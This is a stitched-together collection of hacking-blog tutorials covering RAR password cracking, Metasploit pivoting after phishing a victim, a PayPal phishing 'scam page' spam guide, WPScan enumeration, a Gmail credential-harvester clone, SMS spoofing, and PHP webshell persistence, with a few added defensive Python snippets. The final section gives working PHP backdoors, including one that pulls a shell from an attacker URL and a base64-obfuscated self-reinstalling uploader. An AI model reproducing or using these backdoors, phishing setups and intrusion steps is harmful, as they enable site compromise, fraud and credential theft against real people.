Sunday, 23 November 2014

RAR password cracking with cRARk

cRARk is a .rar archive password cracker. Unlike rarcrack, it can be customised to a far greater extent, allowing partial passwords, wordlists, complementing wordlists with characters and more.
The programme is also CUDA enabled, which allows for a vast increase in testing speed,
but only if you have a capable graphics card (http://www.nvidia.com/object/cuda_gpus.html).


cRARk is not installed by default on BT4 Final, a shame really as it is more versatile than rarcrack in my opinion. To install it though is a piece of cake ;

apt-get install crark

! During the install, the program tried to install the CUDA dependencies as well; in order for this to work properly you will need to exit 'X'. To do this press Ctrl + Del + Backspace to get back into Command Line only.
So it seems the best way to install is to get online, then quit X with Ctrl + Del + Backspace, and then run the apt-get install from the command line interface.


The machine I installed it onto does not have any CUDA capabilities, so this post will only go through some of the functions of cRARk without testing the CUDA improvements on cracking speed.
I may later try to do a full HDD install on my desktop to see if I can get my 8800GTS to work.


So after installing cRARk, let's fire it up through either the menu;
Start/Dragon --> Backtrack --> Privilege Escalation --> Password Attacks --> OfflineAttacks --> Crark
or command line ;
cd /pentest/passwords/crark/

Let's check out the files, the readmes and what general options are advised;
ls
./crark







BRUTEFORCE ATTACKS
================

To start off we need to create the password.def file. To do this simply copy either the english.def file or the crackme.def file to password.def ;
cp crackme.def password.def

Then modify the password.def file to reflect the options we want to use.

Here I will be working with simple password protected files stored on my flashdrive (mounted on /media/8GB/)

Testing password protected test100.rar file with password 100 ;

nano password.def
Under the double hash enter the testing methods desired, in this case as only numbers ;
[$1] *
Save and exit







As my system cannot use CUDA I will disable it with the -c option when testing.

./crark -c /media/8GB/test100.rar




For checking password protected testabc.rar file with lowercase letters only ;

nano password.def
[$a] *
Save and exit.









./crark -c /media/8GB/testabc.rar






For checking a password protected test-ABC.rar with uppercase characters only ;

nano password.def
[$A] *
Save and exit










./crark -c /media/8GB/test-ABC.rar









To check all of the above on password protected testaB1.rar ;

nano password.def
[$a $A $1] *
Save and exit







./crark -c /media/8GB/testaB1.rar














!! It is important to note that cRARk will start checking based on the same sequence as the characters are entered in the definition file.
So in the above example entering the character information in the definition file as $1 $a $A would take a lot longer to find the password than if using $a $A $1 .

The end result will be the same, cRARk will find the password, but the time needed for checking will be severely affected.
(I thought I had messed up somewhere earlier on when I changed character sequence in definition file and it took longer than previous attempts).


To go all out and also include special characters ;
nano password.def
[$a $A $1 $!] *
Save and exit.

To test the password.def file and see whether the commands are going to work OK, the programme can test run the definitions using the -v option ;

./crark -c -v /media/8GB/test100.rar

This won't actually start the cracking process, but will print the characters on screen so you can check whether it's doing what you want it to.



To specify the number of characters, the options -l & -g can be used.
So to specify a minimum of 3 characters and a maximum of 5 characters;

./crark -c -l3 -g5 /media/8GB/testabc.rar

The bruteforce attempts resulted in an average of around 60 pass/sec on my netbook and around 160 pass/sec on my desktop (windows version of cRARk).
With CUDA this will be greatly enhanced, but have to see if/when I can get that going.
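
The effect of character-group order and of the -l / -g bounds on search time, as an added example (not code from cRARk or from the original post). It assumes candidates are tried shortest first and in odometer order with the rightmost character changing fastest, and it uses the 60 pass/sec netbook rate quoted above; the function names are made up for this sketch.

```python
import string

# Character groups as named in the post's password.def lines.
# ($! is left out: the post does not list which symbols it covers.)
GROUPS = {
    "$a": string.ascii_lowercase,
    "$A": string.ascii_uppercase,
    "$1": string.digits,
}


def alphabet(order):
    """Concatenate the groups in the order they appear in the definition."""
    return "".join(GROUPS[name] for name in order)


def keyspace(order, min_len, max_len):
    """Number of candidates for lengths min_len..max_len (the -l / -g bounds)."""
    n = len(alphabet(order))
    return sum(n ** k for k in range(min_len, max_len + 1))


def position(password, order, min_len=1):
    """1-based index of `password` in the ASSUMED enumeration order:
    shorter candidates first, then odometer order (rightmost char fastest)."""
    chars = alphabet(order)
    n = len(chars)
    if len(password) < min_len or any(c not in chars for c in password):
        raise ValueError("password is outside the defined search space")
    shorter = sum(n ** k for k in range(min_len, len(password)))
    index = 0
    for c in password:
        index = index * n + chars.index(c)
    return shorter + index + 1


def hours(candidates, rate_per_sec):
    """Time to test `candidates` passwords at a fixed rate, in hours."""
    return candidates / rate_per_sec / 3600


if __name__ == "__main__":
    rate = 60  # pass/sec, the netbook figure from the post
    for order in (["$a", "$A", "$1"], ["$1", "$a", "$A"]):
        tries = position("aB1", order)
        print(" ".join(order), "->", tries, "candidates,", round(tries / rate), "s")
    total = keyspace(["$a"], 3, 5)
    print("[$a] * with -l3 -g5:", total, "candidates,",
          round(hours(total, rate), 1), "h to exhaust")
```

Under these assumptions the three-character test password is reached roughly eight times sooner with $a $A $1 than with $1 $a $A, while a five-character lowercase-only space already takes more than two days to exhaust at this rate.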


WORDLIST/DICTIONARY ATTACKS
======================

cRARk also has the option to check passwords from a wordlist file.
To do this the password.def file needs to be adjusted to specify the location of the wordlist with $w. In this case I have copied a small English wordlist called english.dic into cRARk's directory.
(You can of course also specify an alternative location where the wordlist is)

  
Then we need to specify that cRARk will use a wordlist in password.def ;

nano password.def
$w = "english.dic"
##
$w
Save and exit.






./crark -c /media/8GB/testAmsterdam.rar




The dictionary attacks averaged around 20 pass/sec on my netbook and I understand that there is no CUDA support for the dictionary attacks.
So having a focussed wordlist is a must !


To allow an easier choice of options, it is also possible to prepare some definition files and then specify these with the -p option.
For instance you can prepare a .def file which will use a wordlist file as follows and then keep it there for future use ;

cp password.def wordlist.def












Then to specify to use the newly created wordlist.def file, the -p option is included ;

./crark -c -pwordlist.def /media/8GB/testAmsterdam.rar






















There are a huge number of options to play with when it comes to the wordlist usage, extra options can be included to capitalize / invert / mashup / add numbers etc etc etc

I may update the post to show some of these options on a test wordlist.

It will be interesting to see how far I can get with the CUDA side of things, however that would mean a full HDD install on the desktop (doesn't work in VMware).



ADVANCED DICTIONARY OPTIONS

Following some queries in the comments I got to checking how the wordlist and the wordlist
manipulations work.
It truly is fantastically (and terrifyingly) customizable..

If for instance you have a list of words and you know that the password is a combination
of a couple of these words, then you can tell crark to do that in the .def file as follows;
For 2 words from the wordlist in succession;

wordlist.def
$w = "wordlist.txt"
##
$w $w



For 3 words from the wordlist in succession;

wordlist.def
$w = "wordlist.txt"
##
$w $w $w
















If you have 2 wordlists and you know that the password will be a combination of
words of the 2 lists (only 1 way, so words from 2nd list appended to words from 1st list for instance)
then you can identify the 2nd wordlist with the $u function ;

wordlist.def
$u = "wordlist1.txt"
$w = "wordlist2.txt"
##
$u $w

So in the above all words from wordlist2.txt will be suffixed/appended to each word in wordlist1.

And of course any number of combinations of the above can be made.

In the below example ;
wordlist.def
$w = "test1.txt"
$u = "test2.txt"
##
$u$w$u

















Author's Helpfile & Linkage ;
http://www.crark.net/cRARk.html


Video on the above ;
http://blip.tv/file/3275276
or
http://www.youtube.com/watch?v=viYdoZiCYaA

How to Pivot from Victim System to Owning the Network with Metasploit

To own a network and retrieve the key data,
we only need to find ONE weak link in the network.
It makes little sense to beat our heads against heavily fortified systems like the file and database server when we can take advantage of the weakest link of all:
Humans. (I wish the weakest link of all were Robots… maybe some other time)

Somewhere on the network,
some clerk with little work to do and lots of time to play on the Internet can be enticed to visit our malicious website,
open our malicious Word doc, or view our malicious PDF.

Once we compromise this single target on the network,
we can then pivot from that single compromised system to
own the network and ultimately grab the goodies on the server or database server.




In this tutorial, we will look at how to pivot from a single compromised system on the network to compromise and
own the most heavily fortified servers on the network.
Once you find that single weak link, then you go after the BIG BOYS!

Step 1: Compromise a Client

The first step, of course, is to compromise a single machine on the network.
In the diagram above, let’s go after someone in the engineering department.
We can do this by sending them a malicious link, PDF, or Word doc, or by going after an unpatched operating system.
Any of these and many others will work.

In my case here, I’m going to use a malicious link and send it via email to one of the people on the engineering department
with a note that says it’s a “hilarious video” they need to see. Let’s create that link.

Step 2: Open Metasploit

Fire up BackTrack or Kali and open the Metasploit console.





Step 3: Choose an Exploit

In this case,
I am using the ie_unsafe_scripting exploit, but any exploit will work.
We simply need to find ONE system on the network that is vulnerable to own the entire network.





If you are unsure about how to do this,
take a look at this tutorial or this guide.
Either will work, as well as many others.

Step 4: Get Meterpreter

Once the victim opens the malicious link,
we get a meterpreter prompt like that below. From the meterpreter prompt, we can type:

meterpreter > ipconfig





This will reveal to us the network interfaces on our target system and the IP and MAC addresses associated
with each of them.
As you would expect, Interface 1 is the loopback interface,
and in this case, Interface
2 is associated with IP 192.168.1.101.

Your results may be different based upon the configuration of the compromised machine.

Step 5: Scan the Network

Now that we are inside the network,
we can use an auxiliary module in Metasploit called arp_scanner, which enables us to use the ARP protocol to
discover other internal systems on the network similar to the Netdiscover tool. Let’s type:

meterpreter > run arpscanner -h

This gives us a help screen for Metasploit’s arp_scanner.





Now to run the arp_scanner, we can type:

meterpreter > run arp_scanner -r 192.168.1.0/24

Where:

run is the command to execute internal meterpreter scripts

-r precedes the target address range or CIDR notation network

192.168.1.0/24 is the CIDR notation to include this entire internal Class C network with a netmask of 255.255.255.0




Running the arp scanner reveals all the systems on the internal network.
For our purposes here, the default gateway at 192.168.1.1, is probably the most important.
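
From the defender's side, a sweep like this shows up as one host asking for many different addresses in a few seconds. The following is an added example, not part of the original tutorial or of Metasploit: it runs that detection over constructed tcpdump-style ARP lines, with thresholds and function names chosen for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# tcpdump-style ARP request line (time-of-day stamp only, so a capture that
# crosses midnight is not handled here).
ARP_REQUEST = re.compile(
    r"^(\d{2}:\d{2}:\d{2}\.\d{1,6}) ARP, Request who-has (\S+) tell (\S+), length \d+$"
)


def detect_arp_sweeps(lines, window_s=10, min_targets=20):
    """Return {source_ip: max distinct targets asked for inside one window}
    for every source that reached min_targets."""
    window = timedelta(seconds=window_s)
    recent = defaultdict(deque)   # source -> (timestamp, target) pairs in window
    flagged = {}
    for line in lines:
        m = ARP_REQUEST.match(line.strip())
        if not m:
            continue              # replies and non-ARP lines are ignored
        ts = datetime.strptime(m.group(1), "%H:%M:%S.%f")
        target, source = m.group(2), m.group(3)
        seen = recent[source]
        seen.append((ts, target))
        while ts - seen[0][0] > window:
            seen.popleft()        # drop requests that fell out of the window
        distinct = len({t for _, t in seen})
        if distinct >= min_targets:
            flagged[source] = max(flagged.get(source, 0), distinct)
    return flagged


def sample_capture():
    """Constructed capture: .101 asks for 40 addresses in two seconds,
    next to two ordinary lookups and one reply."""
    lines = [
        "12:00:00.010000 ARP, Request who-has 192.168.1.1 tell 192.168.1.20, length 28",
        "12:00:00.020000 ARP, Reply 192.168.1.1 is-at 00:11:22:33:44:55, length 46",
    ]
    for i in range(1, 41):
        stamp = f"12:00:{i // 20:02d}.{(i % 20) * 50000:06d}"
        lines.append(
            f"{stamp} ARP, Request who-has 192.168.1.{i} tell 192.168.1.101, length 28"
        )
    lines.append(
        "12:00:05.000000 ARP, Request who-has 192.168.1.20 tell 192.168.1.1, length 46"
    )
    return lines


if __name__ == "__main__":
    for source, count in detect_arp_sweeps(sample_capture()).items():
        print(f"possible ARP sweep from {source}: {count} distinct targets")
```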

Step 6: Add a Route

In the final step, we will background our meterpreter session (this simply puts our
meterpreter session into the background meaning it is still running, but we can go back to the Metasploit console and run other commands). Then
we would add a route from the default gateway to our compromised system so that
ALL traffic from the default gateway must be routed through the compromised machine.

In this way,
we will have access to all systems and subnets that access that default gateway,
enabling us to compromise them as well.





Now that we have successfully added the route between the default gateway and our victim computer,
the network is—for all intents and purposes—OURS!
We can now use that single compromised machine to attack all the systems on the network
both within the engineering subnet and all the subnets that use the default gateway.

Of course, to own those machines,
we will have to take the final step of running an exploit against each of those machines,
but we will no longer have to be concerned about Intrusion Prevention Systems
(IPS) and firewalls as we are now attacking from INSIDE the network!

World

This stuff we need for do spamming.

1 :=> Cpannel

2 :=> MAILLER OR SMTP

3 :=> SCAM PAGE

4 :=> LEADS (email’s)


Chapter 1

SETUP SCAM PAGE IN CPANNEL

1 :=> The most knobs ask me how Cpanne
looks like n how I can upload scam page in Cpannel. So the
ans in here look in fig 1…..



Now you know how Cpannel look likes and
now we need to change our result email in scam page and
upload our scam page in Cpannel. Let’s see how we can do this

Changing email :=> Unzip your scam page and find the PHP file where we can change our email result. Like this as shown in fig 2




First login into Cpannel and then click Sub domain option u can see in fig 1.
Than make a sub domain and click to document root to upload your scam
page and then upload it you can see in fig 3



After click here one page will
open like this here u can upload ur scam page zip file.
As you can see in fig 4



Now we uploaded our scam page successfully. After uploaded
scam page extract your zip file from extract option.
Now we setup scamp page setup successfully here look likes.



If anyone login in this page you will found id n pass in your mail account.

CHAPTER 2

MAIL SENDING WITH PHP INBOX MAILLER

2 :=> Open PayPal letter n change the scam page link with your
new scam page link. Like we change email address in scam page.

Now we need to send mail’s to our victims than they found your mail
and some of them login and you found your hack result.



Now our work done our victims found our fake email’s n they think that
PayPal message to update his or her account information and they click
our scam page link. After that we found victims email n pass (login’s ) : D .



In next part I will teach you how to do with SMTP.

Scanning WordPress Using WP Scanner

Hello everyone, today I'm going to explain how to scan your WordPress site or your website using WP Scanner. It is very easy, and I'm going to use my own website as a demonstration.
So shall we start?
First off, I'm using Kali Linux. As far as I know this tool is written in Ruby, so you can also install Ruby on Windows and download the WPScan tool.
Note: As ethical hacking is allowed worldwide, we are doing these tutorials only for educational purposes and to protect you from vulnerabilities and hackers; we are not responsible for misuse of this tool.
So, as we said before, open the Terminal or command line and let's try to get the username of the target website, using this command:

wpscan --url security-dz.com --enumerate u


And the result is as shown in the picture below:

Some people ask what the purpose of getting the administration username is: the username is used to brute force into the administration panel, which is why the hacker gets it.
Now let's try to scan the whole script and plugins to see if we have errors or vulnerabilities that could lead to our website being hacked, by writing this command:

wpscan --url security-dz.com


and the result is shown in the picture below:

As you can see, I found an error, and it was a full path disclosure. It will also give you a full report about the vulnerability and a reference on a security website on how to exploit it and how to fix it.
If you have any questions, feel free to ask me in the comment section below.

Harvester Tut

Credential Harvester Tutorial


What is the social engineer toolkit?
The Social-Engineer Toolkit (SET) was created and written by the founder of TrustedSec. It is an open-source Python-driven tool aimed at penetration testing around Social-Engineering. SET has been presented at large-scale conferences including Blackhat, DerbyCon, Defcon, and ShmooCon. With over two million downloads, SET is the standard for social-engineering penetration tests and supported heavily within the security community.

The Social-Engineer Toolkit has over 2 million downloads and is aimed at leveraging advanced technological attacks in a social-engineering type environment. TrustedSec believes that social-engineering is one of the hardest attacks to protect against and now one of the most prevalent. The toolkit has been featured in a number of books including the number one best seller in security books for 9 months since its release,“Metasploit: The Penetrations Testers Guide” written by TrustedSec’s founder as well as Devon Kearns, Jim O’Gorman, and Mati Aharoni.

SET is included in the latest version of the most popular Linux distribution focused on security, Back|Track. It can also be downloaded through github using the following command:
git clone https://github.com/trustedsec/social-engineer-toolkit/ set/
https://www.trustedsec.com/downloads/social-engineer-toolkit/

Alright so getting started! first navigate to S.E.T. : Applications>Kali Linux>Exploitation tools>Social Engineer Toolkit

Now we should be at the main S.E.T screen as shown



Now if you noticed they're all numbered so I am just going to direct you which numbers to choose from here on out as to avoid tons of pics!

First choose 1: Social Engineering attacks
Second choose 2: Website attack vectors
Third choose 3: (Ironically  lol) Credential Harvester Attack Method
Fourth choose 2: Site cloner
Now if you're on Linux (which you should be ) lol do an "ifconfig" really quick in terminal and get your IP
If you're on Windows CMD "ipconfig"

Now type in your IP where it asks for it!
Then it will prompt you for a Website to clone really quick for example i used gmail! http://www.gmail.com

Now you should have a Blue text saying Credential Harvester with the port number as shown below



If your shit looks like the pic above your good to go  haha
Now everything is quite simple ( as if it wasnt already ) all we are going to do is send our IP to our victim! i suggest shortening the link so he dosnt see a random sketch IP

As soon as our victim clicks the link he will be directed to a IDENTICAL gmail login page and hopefully dumb enough to log in




As soon as he fills this out and clicks login The username and password will be captured and sent to your S.E.T session as shown below




Well thats it for today folks hope youve enjoyed the Tut and find it useful  lol

BackTrack and Kali SMS Spoofing

Well guys, I just learned how to do this and decided to make a tutorial.
This would have been great to use in my Spotify method, were it still operational.
Enjoy the following content, which I drafted myself (borrowed a photo or two).
Purely for educational purposes, I'm not responsible for your actions.


What is SMS Spoofing?
SMS spoofing is the method of sending text messages and making them appear to have come from a predetermined sender.
If the messages are replied to, the responses will be delivered to the number from which it appears that the message was sent.

How does it work?
The message is composed, and then right before being sent the final message draft is edited so that the actual sender is replaced with either another number or text.

So, What do I need to spoof SMS?
Backtrack 5.
Any version will work as long as it has Social Engineering Tools.

That's awesome! How do I make it work?
Follow the steps below.

Download and Install Backtrack / Live Boot Backtrack
Navigate to "Applications" > "Backtrack" > "Exploitation Tools" > "Social Engineering Tools" > "SET"
Press 1, followed by Enter, to open up the menu for "Social Engineering Attacks"

Press 7, followed by Enter, to specify SMS Spoofing attack.
Press 1, followed by Enter, to launch an attack on a single number.
You will be required to input your victim's cell number.

Decide to craft a one time message, or to use a predefined template.


Play around, and have fun with it.

Shell Security and Backdoors 101

Shell Safety and Backdooring

Today, I will be giving a small tutorial on shell safety and backdooring your hacked websites.

I will also include some tools and code for you to use to help you on your journey.

There are many reasons for shell safety and adding a backdoor into a website that are beneficial. Here are a few.
- Keep from losing access to the site
- Keep other hackers from finding your shell
- Reupload files if the webmaster / server owners find and delete your files
- Load malware/redirect/steal cookies/etc..

So, I assume that you have a shell uploaded to a hacked server. You are sitting there, trying to figure out what you want to do with it. There are a few scenarios right off hand.

(non preferred) Deface that bastard: Well, you could ruin their index with your cheap flashing deface page with all your "greetz" to your homies and lose all your access.
(preferred) Backdoor the bitch: You could place backdoors in some of their code. Where and such depends on the code your entering.
(better than defacing but not as good as backdooring) Just leave your shell, keep url and hope it stays

So, with these options, I will stick to the preferred methods.

Lets begin with shell security.

#1 - First off, any GOOD shell will be password protected. When deciding your password, make an md5 hash of it and search for it on google. If yours can be found, choose a different path. This has let me into so many shells it's ridiculous.

#2 - Another good thing to have with your shell, is a basic hidden 404 page when visiting and no session has been started with it. Example: My 404 shell. This will throw people off thinking its really a page not found and such.

#3 - You also want to make sure your shell can't be found through text and such that shows up through dorking search engines. People will steal your shell this way.

#4 - The next important thing, is not to upload too many things, db connectors, mass defacers etc.. and when you do ALWAYS DELETE THEM AFTERWARDS. You never want to leave more than 1 shell (not even recommended, I will cover this very soon) and a backdoor.

#5 - ALWAYS make sure your shell is encoded, and hard to decode.

There are a few tips for shell security. Lets move on to backdooring, which is the best thing possible.

Backdoors are the way to go. Period. I code 90% of my backdoors in PHP. I have several different ones as they all have a different purpose. I will now give you some examples of some simple backdoors and explain their function.

#1 - Basics of a backdoor
You have 3 good options here. Insert code to be run everytime a page is visited, Do different functions via a get request, or less likely, using POST variables.
An example of having a backdoor run everytime the page is visited, could be to recreate your shell if it happen to be deleted, to log login information or something like that, which I frown upon really.

The best method for my own uses is to get it to show via get request. Example: hacked.com/hackeddir/index.php?backdoor which would then show my backdoor and let me use my options.

So, what should we have in our backdoor? Well, First I assume that you want to keep your shell on the server or recreate it when it's deleted. Lets work on this!

Lets say you have a shell and can write to the index file. hacked.com/index.php.

Here is a small example of their index.

Code:
<html>
<head>
blahsldfja
</head>
<body>
php code blah blah here
</body>
</html>

To start a backdoor code in it. go to after the </html> tag and put in the following.

PHP Code:
<?phpif(isset($_GET['makeshell'])){
  $filename = $_GET['makeshell'];
  $shelltxt = "URL TO TEXT FILE WITH SHELL CODING IN IT";
  $getcode = file_get_contents($shelltxt);
  $file = fopen($filename, 'w');
  fwrite($file, $getcode);
  echo "Shell Created: <a href='$filename'>Link</a>";
}?>
Replace the "URL TO TEXT FILE WITH SHELL CODING IN IT" with something like http://attacker.com/shell.txt

Now, the url to utilize this would be index.php?makeshell=shellname.php (replace shellname.php with what you want your file to be)

Then, you can go to hackedsite.com/shellname.php and voilà! You got a shell made on the fly! Simple enough right? Let's go a little more in depth.

Say instead of making a shell, you just want ability to upload files (better than hosting a url to your shell file).

You could use the following code after </html>

PHP Code:
<?php
  if(isset($_GET['kupload'])){
    define("MAX_FILE_SIZE", 99999999999999999); // Maximum file size is 10 mb, 10485760 is in bytes

    if(isset($_POST['submit'])) {
        // Files variables
        $file_name    = $_FILES['file']['name']; // File name
        $file_size    = $_FILES['file']['size']; // File size
        $file_type    = $_FILES['file']['type']; // The file type, if we want to upload a determinated type of file
        $file_temp    = $_FILES['file']['tmp_name']; // Our temporaney file
        $file_error = $_FILES['file']['error']; // The files errors
        $file_dest    = basename($file_name); // File destination

        if ($file_size <= MAX_FILE_SIZE) {
        // Uploading file
            if(move_uploaded_file($file_temp, $file_dest))
            {              
                echo 'File uploaded: '.$file_dest;
                echo '<p><a href="'.$file_dest.'">go to file</a> </p>';
             }
            else
            {
                echo 'Error: '.$file_error;
            }
        } else {
            echo "This file is too big!";
        }

    } else {
  
        // Uploading form
        echo '<h1>add file</h1>';
        echo '<form method="post" action="" enctype="multipart/form-data">
              file: <input type="file" name="file"><br /><br />
            
              <input type="submit" name="submit" class="button" value="Upload">
            
              </form>';
        echo '</div>';
    }
  }?>

The url to get this would be http://www.hacked.com/index.php?kupload ((**NOTE** I use kupload as just "upload" is used, and i want mine to be unique!))

You would be given an upload box, simply upload any file as long as it's not too big, then you don't have to worry about giving away a link to a shell script or anything like that.

You can also combine both of the above, so you can quickly make a shell or upload form.

There is an unlimited amount of things you can include with this. You can make your backdoor do pretty much anything!

Another little trick is to use two backdoors that also remake the other backdoor in case one gets deleted. Obviously it's all about how well you hide your backdoor along with how much the owner of the website really pays attention.

So how would you go about this you ask? Let me show you an example.

Say you have two files. Index.php in the main directory, admin.php in /admin/ directory.

In index.php enter this code.

PHP Code:
<?php
$shell2 = "admin/admin.php";$contents = file_get_contents($shell2);$pattern = '/kupload/';$bdcode = "?><?php ".base64_decode("ICBpZihpc3NldCgkX0dFVFsncHduZWQnXSkpew0KICAgIGRlZmluZSgiTUFYX0ZJTEVfU0laRSIsIDk5​OTk5OTk5OTk5OTk5OTk5KTsgLy8gTWF4aW11bSBmaWxlIHNpemUgaXMgMTAgbWIsIDEwNDg1NzYwIGlz​IGluIGJ5dGVzIA0KDQogICAgaWYoaXNzZXQoJF9QT1NUWydzdWJtaXQnXSkpIHsNCiAgICAgICAgLy8g​RmlsZXMgdmFyaWFibGVzIA0KICAgICAgICAkZmlsZV9uYW1lICAgID0gJF9GSUxFU1snZmlsZSddWydu​YW1lJ107IC8vIEZpbGUgbmFtZSANCiAgICAgICAgJGZpbGVfc2l6ZSAgICA9ICRfRklMRVNbJ2ZpbGUn​XVsnc2l6ZSddOyAvLyBGaWxlIHNpemUgDQogICAgICAgICRmaWxlX3R5cGUgICAgPSAkX0ZJTEVTWydm​aWxlJ11bJ3R5cGUnXTsgLy8gVGhlIGZpbGUgdHlwZSwgaWYgd2Ugd2FudCB0byB1cGxvYWQgYSBkZXRl​cm1pbmF0ZWQgdHlwZSBvZiBmaWxlIA0KICAgICAgICAkZmlsZV90ZW1wICAgID0gJF9GSUxFU1snZmls​ZSddWyd0bXBfbmFtZSddOyAvLyBPdXIgdGVtcG9yYW5leSBmaWxlIA0KICAgICAgICAkZmlsZV9lcnJv​ciA9ICRfRklMRVNbJ2ZpbGUnXVsnZXJyb3InXTsgLy8gVGhlIGZpbGVzIGVycm9ycyANCiAgICAgICAg​JGZpbGVfZGVzdCAgICA9IGJhc2VuYW1lKCRmaWxlX25hbWUpOyAvLyBGaWxlIGRlc3RpbmF0aW9uIA0K​IA0KICAgICAgICBpZiAoJGZpbGVfc2l6ZSA8PSBNQVhfRklMRV9TSVpFKSB7IA0KICAgICAgICAvLyBV​cGxvYWRpbmcgZmlsZSANCiAgICAgICAgICAgIGlmKG1vdmVfdXBsb2FkZWRfZmlsZSgkZmlsZV90ZW1w​LCAkZmlsZV9kZXN0KSkNCiAgICAgICAgICAgIHsNCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAg​ICAgICBlY2hvICdGaWxlIHVwbG9hZGVkOiAnLiRmaWxlX2Rlc3Q7DQogICAgICAgICAgICAgICAgZWNo​byAnPHA+PGEgaHJlZj0iJy4kZmlsZV9kZXN0LiciPmdvIHRvIGZpbGU8L2E+IDwvcD4nOw0KIA0KICAg​ICAgICAgICAgfQ0KICAgICAgICAgICAgZWxzZQ0KICAgICAgICAgICAgew0KICAgICAgICAgICAgICAg​IGVjaG8gJ0Vycm9yOiAnLiRmaWxlX2Vycm9yOyANCiAgICAgICAgICAgIH0NCiAgICAgICAgfSBlbHNl​IHsgDQogICAgICAgICAgICBlY2hvICJUaGlzIGZpbGUgaXMgdG9vIGJpZyEiOyANCiAgICAgICAgfSAN​Cg0KICAgIH0gZWxzZSB7IA0KICAgIA0KICAgICAgICAvLyBVcGxvYWRpbmcgZm9ybSANCiAgICAgICAg​ZWNobyAnPGgxPmFkZCBmaWxlPC9oMT4nOw0KICAgICAgICBlY2hvICc8Zm9ybSBtZXRob2Q9InBvc3Qi​IGFjdGlvbj0iIiBlbmN0eXBlPSJtdWx0aXBhcnQvZm9ybS1kYXRhIj4gDQogICAgICAgICAgICAgIGZp​bGU6IDxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIj48YnIgLz48YnIgLz4NCiAgICAgICAgICAg​ICAgDQogICA
gICAgICAgICAgIDxpbnB1dCB0eXBlPSJzdWJtaXQiIG5hbWU9InN1Ym1pdCIgY2xhc3M9​ImJ1dHRvbiIgdmFsdWU9IlVwbG9hZCI+DQogICAgICAgICAgICAgIA0KICAgICAgICAgICAgICA8L2Zv​cm0+JzsgDQogICAgICAgIGVjaG8gJzwvZGl2Pic7DQogICAgfSANCiAgfQ==");preg_match($pattern,$data,$match);
if(count($match)<1)
{
  $file = fopen($shell2, 'a');
  fwrite($file, $bdcode);
}?>

Now, everytime index.php is visited, it will check for the presence of our uploader in admin.php. If its not there, it will readd it, if it is there, it does nothing.
With a little modification, you could put the same in admin.php to check index.php for the same thing. That way, its way more likely that you will keep the backdoors for as long as possible.

Also, its a very smart idea to encode all of your backdoors. The more its encoded the better.

I hope you have enjoyed this small tutorial, I plan on making a part 2 to this with more sophisticated code
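
For site owners, the techniques described in this post leave recognisable traces: PHP appended after the closing </html> tag, request input sitting next to file-writing calls, long base64 literals, and legitimate files whose contents no longer match a known-good copy. The following is an added example, not code from the original post: a triage sketch that combines those heuristics with a hash baseline. The sample files are constructed and inert, and all names are chosen for illustration.

```python
import hashlib
import re

SUPERGLOBAL = re.compile(r"\$_(GET|POST|REQUEST|FILES)\b")
WRITE_CALL = re.compile(r"\b(fwrite|file_put_contents|move_uploaded_file)\s*\(")
PHP_AFTER_HTML = re.compile(r"</html\s*>.*?<\?php", re.I | re.S)
LONG_B64 = re.compile(r"base64_decode\s*\(\s*([\"'])[^\"']{200,}\1")


def indicators(source):
    """Heuristic triage flags; a hit means 'review this file', not proof."""
    found = []
    if PHP_AFTER_HTML.search(source):
        found.append("php_after_html_close")
    if SUPERGLOBAL.search(source) and WRITE_CALL.search(source):
        found.append("request_driven_write")
    if LONG_B64.search(source):
        found.append("long_base64_literal")
    return found


def sha256(text):
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def audit(baseline, current):
    """baseline: path -> sha256 of the known-good file; current: path -> source.
    Returns only files that changed, are new, or carry an indicator."""
    report = {}
    for path, source in sorted(current.items()):
        if path not in baseline:
            integrity = "new"
        elif baseline[path] != sha256(source):
            integrity = "modified"
        else:
            integrity = "unchanged"
        flags = indicators(source)
        if flags or integrity != "unchanged":
            report[path] = {"integrity": integrity, "indicators": flags}
    return report


def sample_site():
    """Constructed, inert sample: the appended stubs only exist to trip the rules."""
    good = {
        "index.php": "<html><body><?php echo 'hi'; ?></body></html>\n",
        "admin/admin.php": "<?php require 'auth.php'; ?>\n<html><body>admin</body></html>\n",
        "contact.php": "<html><body>contact</body></html>\n",
    }
    baseline = {path: sha256(src) for path, src in good.items()}
    current = dict(good)
    current["index.php"] += "<?php if (isset($_GET['k'])) { fwrite($h, $d); } ?>"
    current["admin/admin.php"] += "<?php $x = base64_decode('" + "QUJD" * 60 + "'); ?>"
    current["about.php"] = "<html><body>about</body></html>\n"
    return baseline, current


if __name__ == "__main__":
    for path, entry in audit(*sample_site()).items():
        print(path, entry)
```

Because the post's two-file trick has each file re-create the other, every file reported as modified should be restored from the known-good copy in the same step, not one at a time.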